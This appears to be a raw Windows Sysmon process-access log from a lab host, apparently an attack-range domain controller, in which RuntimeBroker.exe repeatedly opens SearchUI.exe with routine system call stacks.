13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
